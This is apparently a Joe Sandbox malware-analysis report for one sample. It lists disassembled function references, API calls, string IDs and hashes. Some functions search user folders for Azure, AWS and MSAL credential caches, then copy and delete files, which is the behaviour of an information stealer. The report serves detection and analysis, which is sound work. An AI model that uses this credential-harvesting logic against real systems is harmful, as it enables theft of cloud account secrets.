                                                                                                                                                                        • Associated: 00000000.00000002.2042727911.00000000001BD000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.00000000001DD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.00000000001E3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.00000000001E7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.00000000001F2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.0000000000201000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.00000000002C9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.00000000002CF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.0000000000305000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.000000000030C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.0000000000313000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.000000000031A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.000000000032B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.0000000000332000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.0000000000345000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.0000000000351000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.000000000037E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.000000000039F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.00000000003DD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2043302767.00000000003F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_0_2_180000_aZm1EZ2IYr.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: lstrcat$lstrcpy$lstrlen$Create_memset$FileObjectProcessSingleSystemTimeWait
                                                                                                                                                                        • String ID: .exe$EMPTY$df523263f44cc8d55414a260a0197e4a
                                                                                                                                                                        • API String ID: 141474312-3968930026
                                                                                                                                                                        • Opcode ID: e5edde451932176a49fb4b01478f02cdd7c0ce00a5848d7b91c359689fa36de9
                                                                                                                                                                        • Instruction ID: 1c256f900ed2d6b23e0f8fa4d4d7de9671cd909dd74d0323b6cb1a43333e22b8
                                                                                                                                                                        • Opcode Fuzzy Hash: e5edde451932176a49fb4b01478f02cdd7c0ce00a5848d7b91c359689fa36de9
                                                                                                                                                                        • Instruction Fuzzy Hash: D191C7B2D401299BDF12BB64DC86ADD77B8AB28304F4144E5F609B7162CB70AF868F54
                                                                                                                                                                        Function 001964FF Relevance: 33.4, APIs: 10, Strings: 9, Instructions: 114stringCOMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        APIs
                                                                                                                                                                        • _memset.LIBCMT ref: 00196524
                                                                                                                                                                          • Part of subcall function 00191D91: SHGetFolderPathA.SHELL32(00000000,?,00000000,00000000,?,?,?), ref: 00191DD2
                                                                                                                                                                        • lstrcatA.KERNEL32(?,00000000,?,00000000,?), ref: 00196543
                                                                                                                                                                        • lstrcatA.KERNEL32(?,\.azure\), ref: 00196560
                                                                                                                                                                          • Part of subcall function 00196013: wsprintfA.USER32 ref: 0019605A
                                                                                                                                                                          • Part of subcall function 00196013: FindFirstFileA.KERNEL32(?,?), ref: 00196071
                                                                                                                                                                          • Part of subcall function 00196013: StrCmpCA.SHLWAPI(?,001B6ABC), ref: 00196092
                                                                                                                                                                          • Part of subcall function 00196013: StrCmpCA.SHLWAPI(?,001B6AC0), ref: 001960AC
                                                                                                                                                                          • Part of subcall function 00196013: wsprintfA.USER32 ref: 001960D3
                                                                                                                                                                          • Part of subcall function 00196013: StrCmpCA.SHLWAPI(?,001B6647), ref: 001960E7
                                                                                                                                                                          • Part of subcall function 00196013: wsprintfA.USER32 ref: 00196104
                                                                                                                                                                          • Part of subcall function 00196013: PathMatchSpecA.SHLWAPI(?,?), ref: 00196131
                                                                                                                                                                          • Part of subcall function 00196013: lstrcatA.KERNEL32(?), ref: 00196167
                                                                                                                                                                          • Part of subcall function 00196013: lstrcatA.KERNEL32(?,001B6AD8), ref: 00196179
                                                                                                                                                                          • Part of subcall function 00196013: lstrcatA.KERNEL32(?,?), ref: 0019618C
                                                                                                                                                                          • Part of subcall function 00196013: lstrcatA.KERNEL32(?,001B6ADC), ref: 0019619E
                                                                                                                                                                          • Part of subcall function 00196013: lstrcatA.KERNEL32(?,?), ref: 001961B2
                                                                                                                                                                        • _memset.LIBCMT ref: 00196598
                                                                                                                                                                        • lstrcatA.KERNEL32(?,00000000), ref: 001965BA
                                                                                                                                                                        • lstrcatA.KERNEL32(?,\.aws\), ref: 001965D7
                                                                                                                                                                          • Part of subcall function 00196013: wsprintfA.USER32 ref: 0019611B
                                                                                                                                                                          • Part of subcall function 00196013: CopyFileA.KERNEL32(?,?,00000001), ref: 0019626B
                                                                                                                                                                          • Part of subcall function 00196013: DeleteFileA.KERNEL32(?), ref: 001962DF
                                                                                                                                                                          • Part of subcall function 00196013: FindNextFileA.KERNEL32(?,?), ref: 00196341
                                                                                                                                                                          • Part of subcall function 00196013: FindClose.KERNEL32(?), ref: 00196355
                                                                                                                                                                        • _memset.LIBCMT ref: 0019660C
                                                                                                                                                                        • lstrcatA.KERNEL32(?,00000000), ref: 0019662E
                                                                                                                                                                        • lstrcatA.KERNEL32(?,\.IdentityService\), ref: 0019664B
                                                                                                                                                                        • _memset.LIBCMT ref: 00196680
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000000.00000002.2042684141.0000000000181000.00000080.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true
                                                                                                                                                                        • Associated: 00000000.00000002.2042664621.0000000000180000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042710572.00000000001B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042727911.00000000001BD000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.00000000001DD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.00000000001E3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.00000000001E7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.00000000001F2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.0000000000201000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.00000000002C9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.00000000002CF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.0000000000305000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.000000000030C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.0000000000313000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.000000000031A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.000000000032B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.0000000000332000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.0000000000345000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.0000000000351000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.000000000037E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.000000000039F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.00000000003DD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2043302767.00000000003F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_0_2_180000_aZm1EZ2IYr.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: lstrcat$File_memsetwsprintf$Find$Path$CloseCopyDeleteFirstFolderMatchNextSpec
                                                                                                                                                                        • String ID: *.*$*.*$Azure\.IdentityService$Azure\.aws$Azure\.azure$\.IdentityService\$\.aws\$\.azure\$msal.cache
                                                                                                                                                                        • API String ID: 780282842-974132213
                                                                                                                                                                        • Opcode ID: 02edde5f4f8f23288904aab492e4ac4f81b8faa2f990cfb3c255107b76662ae0
                                                                                                                                                                        • Instruction ID: b80d5aa3bccbf93cd62b3a692be24150455f6d21041634c96aede6044c6c164b
                                                                                                                                                                        • Opcode Fuzzy Hash: 02edde5f4f8f23288904aab492e4ac4f81b8faa2f990cfb3c255107b76662ae0
                                                                                                                                                                        • Instruction Fuzzy Hash: A9418176E4021CAACB25FB64EC87FED777CAB29300F040496F615A7081DBB4AB858F51
                                                                                                                                                                        Function 0018ABBA Relevance: 33.3, APIs: 22, Instructions: 315stringmemoryfileCOMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        APIs
                                                                                                                                                                          • Part of subcall function 001904BC: lstrcpyA.KERNEL32(00000000,00000000,?,001970BD,001B66BA,?,?,?,?,001985D1), ref: 001904E2
                                                                                                                                                                          • Part of subcall function 00191C1F: GetSystemTime.KERNEL32(?,001B66E2,?), ref: 00191C4E
                                                                                                                                                                          • Part of subcall function 001905DE: lstrlenA.KERNEL32(?,00000000,?,?,?,?,001970DE,001B6C20,00000000,001B66BA,?,?,?,?,001985D1), ref: 001905F2
                                                                                                                                                                          • Part of subcall function 001905DE: lstrcpyA.KERNEL32(00000000,?,?,?,?,?,001970DE,001B6C20,00000000,001B66BA,?,?,?,?,001985D1), ref: 0019061A
                                                                                                                                                                          • Part of subcall function 001905DE: lstrcatA.KERNEL32(?,00000000,?,?,?,?,001970DE,001B6C20,00000000,001B66BA,?,?,?,?,001985D1), ref: 00190625
                                                                                                                                                                          • Part of subcall function 0019059C: lstrcpyA.KERNEL32(00000000,?,0000000C,0019762B,001B66D6), ref: 001905CA
                                                                                                                                                                          • Part of subcall function 0019059C: lstrcatA.KERNEL32(?,?), ref: 001905D4
                                                                                                                                                                          • Part of subcall function 00190562: lstrcpyA.KERNEL32(00000000,?,00000000,001970FC,001B6C20,00000000,001B66BA,?,?,?,?,001985D1), ref: 00190592
                                                                                                                                                                        • CopyFileA.KERNEL32(?,?,00000001), ref: 0018AC5F
                                                                                                                                                                        • GetProcessHeap.KERNEL32(00000000,05F5E0FF), ref: 0018AD69
                                                                                                                                                                        • HeapAlloc.KERNEL32(00000000), ref: 0018AD70
                                                                                                                                                                        • StrCmpCA.SHLWAPI(?,001B73D4,00000000), ref: 0018AE21
                                                                                                                                                                        • StrCmpCA.SHLWAPI(?,001B73D8), ref: 0018AE49
                                                                                                                                                                        • lstrcatA.KERNEL32(00000000,?), ref: 0018AE6D
                                                                                                                                                                        • lstrcatA.KERNEL32(00000000,001B73DC), ref: 0018AE79
                                                                                                                                                                        • lstrcatA.KERNEL32(00000000,?), ref: 0018AE83
                                                                                                                                                                        • lstrcatA.KERNEL32(00000000,001B73E0), ref: 0018AE8F
                                                                                                                                                                        • lstrcatA.KERNEL32(00000000,?), ref: 0018AE99
                                                                                                                                                                        • lstrcatA.KERNEL32(00000000,001B73E4), ref: 0018AEA5
                                                                                                                                                                        • lstrcatA.KERNEL32(00000000,?), ref: 0018AEAF
                                                                                                                                                                        • lstrcatA.KERNEL32(00000000,001B73E8), ref: 0018AEBB
                                                                                                                                                                        • lstrcatA.KERNEL32(00000000,?), ref: 0018AEC5
                                                                                                                                                                        • lstrcatA.KERNEL32(00000000,001B73EC), ref: 0018AED1
                                                                                                                                                                        • lstrcatA.KERNEL32(00000000,?), ref: 0018AEDB
                                                                                                                                                                        • lstrcatA.KERNEL32(00000000,001B73F0), ref: 0018AEE7
                                                                                                                                                                        • lstrcatA.KERNEL32(00000000,?), ref: 0018AEF1
                                                                                                                                                                        • lstrcatA.KERNEL32(00000000,001B73F4), ref: 0018AEFD
                                                                                                                                                                        • lstrlenA.KERNEL32(00000000), ref: 0018AF4F
                                                                                                                                                                        • lstrlenA.KERNEL32(?), ref: 0018AF6A
                                                                                                                                                                        • DeleteFileA.KERNEL32(?), ref: 0018AFAD
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000000.00000002.2042684141.0000000000181000.00000080.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true
                                                                                                                                                                        • Associated: 00000000.00000002.2042664621.0000000000180000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042710572.00000000001B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042727911.00000000001BD000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.00000000001DD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.00000000001E3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.00000000001E7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.00000000001F2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.0000000000201000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.00000000002C9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.00000000002CF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.0000000000305000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.000000000030C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.0000000000313000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.000000000031A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.000000000032B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.0000000000332000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.0000000000345000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.0000000000351000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.000000000037E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.000000000039F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.00000000003DD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2043302767.00000000003F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_0_2_180000_aZm1EZ2IYr.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: lstrcat$lstrcpy$lstrlen$FileHeap$AllocCopyDeleteProcessSystemTime
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 1139693110-0
                                                                                                                                                                        • Opcode ID: 8c3df6188e3ae79fcf29a52077f0424a8d6b92e48bc369d397defca204e24785
                                                                                                                                                                        • Instruction ID: 180ad22d2539a9ed29709e891525bb3ae69665e8e850a97e437088300547f592
                                                                                                                                                                        • Opcode Fuzzy Hash: 8c3df6188e3ae79fcf29a52077f0424a8d6b92e48bc369d397defca204e24785
                                                                                                                                                                        • Instruction Fuzzy Hash: 05C1D432904119AFDF02BBA4EC868EE7BB9FF28704F114066F601B7062DB716E469F51
                                                                                                                                                                        Function 0019B8B5 Relevance: 28.1, APIs: 9, Strings: 7, Instructions: 65stringCOMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        APIs
                                                                                                                                                                        • lstrlenA.KERNEL32(00000000,74DE83C0,00000000,0019C5A0,?), ref: 0019B8BA
                                                                                                                                                                        • StrCmpCA.SHLWAPI(74DE83C0,001B613C), ref: 0019B8E8
                                                                                                                                                                        • StrCmpCA.SHLWAPI(74DE83C0,.zip), ref: 0019B8F8
                                                                                                                                                                        • StrCmpCA.SHLWAPI(74DE83C0,.zoo), ref: 0019B904
                                                                                                                                                                        • StrCmpCA.SHLWAPI(74DE83C0,.arc), ref: 0019B910
                                                                                                                                                                        • StrCmpCA.SHLWAPI(74DE83C0,.lzh), ref: 0019B91C
                                                                                                                                                                        • StrCmpCA.SHLWAPI(74DE83C0,.arj), ref: 0019B928
                                                                                                                                                                        • StrCmpCA.SHLWAPI(74DE83C0,.gz), ref: 0019B934
                                                                                                                                                                        • StrCmpCA.SHLWAPI(74DE83C0,.tgz), ref: 0019B940
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000000.00000002.2042684141.0000000000181000.00000080.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true
                                                                                                                                                                        • Associated: 00000000.00000002.2042664621.0000000000180000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042710572.00000000001B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042727911.00000000001BD000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.00000000001DD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.00000000001E3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.00000000001E7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.00000000001F2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.0000000000201000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.00000000002C9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.00000000002CF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.0000000000305000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.000000000030C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.0000000000313000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.000000000031A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.000000000032B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.0000000000332000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.0000000000345000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.0000000000351000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.000000000037E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.000000000039F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.00000000003DD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2043302767.00000000003F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_0_2_180000_aZm1EZ2IYr.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: lstrlen
                                                                                                                                                                        • String ID: .arc$.arj$.gz$.lzh$.tgz$.zip$.zoo
                                                                                                                                                                        • API String ID: 1659193697-51310709
                                                                                                                                                                        • Opcode ID: 0e47a320c9bb73b29fde8727bb9b229812c3ba7e5fe20db1d9f7a6e85077a0af
                                                                                                                                                                        • Instruction ID: 2b353a67950a330f1b5749c8a14f6c6124e69ec45a1249b69ad17e38b018e681
                                                                                                                                                                        • Opcode Fuzzy Hash: 0e47a320c9bb73b29fde8727bb9b229812c3ba7e5fe20db1d9f7a6e85077a0af
                                                                                                                                                                        • Instruction Fuzzy Hash: BF014D20B89366759F722535AFC6DBF1E5D4EABFC17050025FC00E1488DB5C995369B1
                                                                                                                                                                        Function 001935E8 Relevance: 26.5, APIs: 13, Strings: 2, Instructions: 262stringCOMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        APIs
                                                                                                                                                                        • strtok_s.MSVCRT ref: 0019362A
                                                                                                                                                                        • StrCmpCA.SHLWAPI(?,true), ref: 001936EC
                                                                                                                                                                          • Part of subcall function 0019051E: lstrlenA.KERNEL32(?,?,001971B6,001B66BE,001B66BB,?,?,?,?,001985D1), ref: 00190524
                                                                                                                                                                          • Part of subcall function 0019051E: lstrcpyA.KERNEL32(00000000,00000000,?,001971B6,001B66BE,001B66BB,?,?,?,?,001985D1), ref: 00190556
                                                                                                                                                                        • lstrcpyA.KERNEL32(?,?), ref: 001937AE
                                                                                                                                                                        • lstrcpyA.KERNEL32(?,00000000), ref: 001937DF
                                                                                                                                                                        • lstrcpyA.KERNEL32(?,00000000), ref: 0019381B
                                                                                                                                                                        • lstrcpyA.KERNEL32(?,00000000), ref: 00193857
                                                                                                                                                                        • lstrcpyA.KERNEL32(?,00000000), ref: 00193893
                                                                                                                                                                        • lstrcpyA.KERNEL32(?,00000000), ref: 001938CF
                                                                                                                                                                        • lstrcpyA.KERNEL32(?,00000000), ref: 0019390B
                                                                                                                                                                        • strtok_s.MSVCRT ref: 001939CF
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000000.00000002.2042684141.0000000000181000.00000080.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true
                                                                                                                                                                        • Associated: 00000000.00000002.2042664621.0000000000180000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042710572.00000000001B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042727911.00000000001BD000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.00000000001DD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.00000000001E3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.00000000001E7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.00000000001F2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.0000000000201000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.00000000002C9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.00000000002CF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.0000000000305000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.000000000030C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.0000000000313000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.000000000031A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.000000000032B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.0000000000332000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.0000000000345000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.0000000000351000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.000000000037E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.000000000039F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.00000000003DD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2043302767.00000000003F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_0_2_180000_aZm1EZ2IYr.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: lstrcpy$strtok_s$lstrlen
                                                                                                                                                                        • String ID: false$true
                                                                                                                                                                        • API String ID: 2116072422-2658103896
                                                                                                                                                                        • Opcode ID: 8b364284531451f0af76ee60d627368f2e476a0d059e8bae760f515317564998
                                                                                                                                                                        • Instruction ID: fa82cd0710cfc708a1a539ccf7dc6f3af431461d3e6ee1a72fb51058193bf912
                                                                                                                                                                        • Opcode Fuzzy Hash: 8b364284531451f0af76ee60d627368f2e476a0d059e8bae760f515317564998
                                                                                                                                                                        • Instruction Fuzzy Hash: D7B12875901229ABCF65EB54DC89AD977B9FF28304F4001E6E45AA7261EB70AFC4CF40
                                                                                                                                                                        Function 00193A02 Relevance: 26.4, APIs: 14, Strings: 1, Instructions: 127stringCOMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        APIs
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000000.00000002.2042684141.0000000000181000.00000080.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true
                                                                                                                                                                        • Associated: 00000000.00000002.2042664621.0000000000180000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042710572.00000000001B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042727911.00000000001BD000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.00000000001DD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.00000000001E3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.00000000001E7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.00000000001F2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.0000000000201000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.00000000002C9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.00000000002CF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.0000000000305000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.000000000030C000.00000004.00000001.01000000.00000003.sdmpDownload File
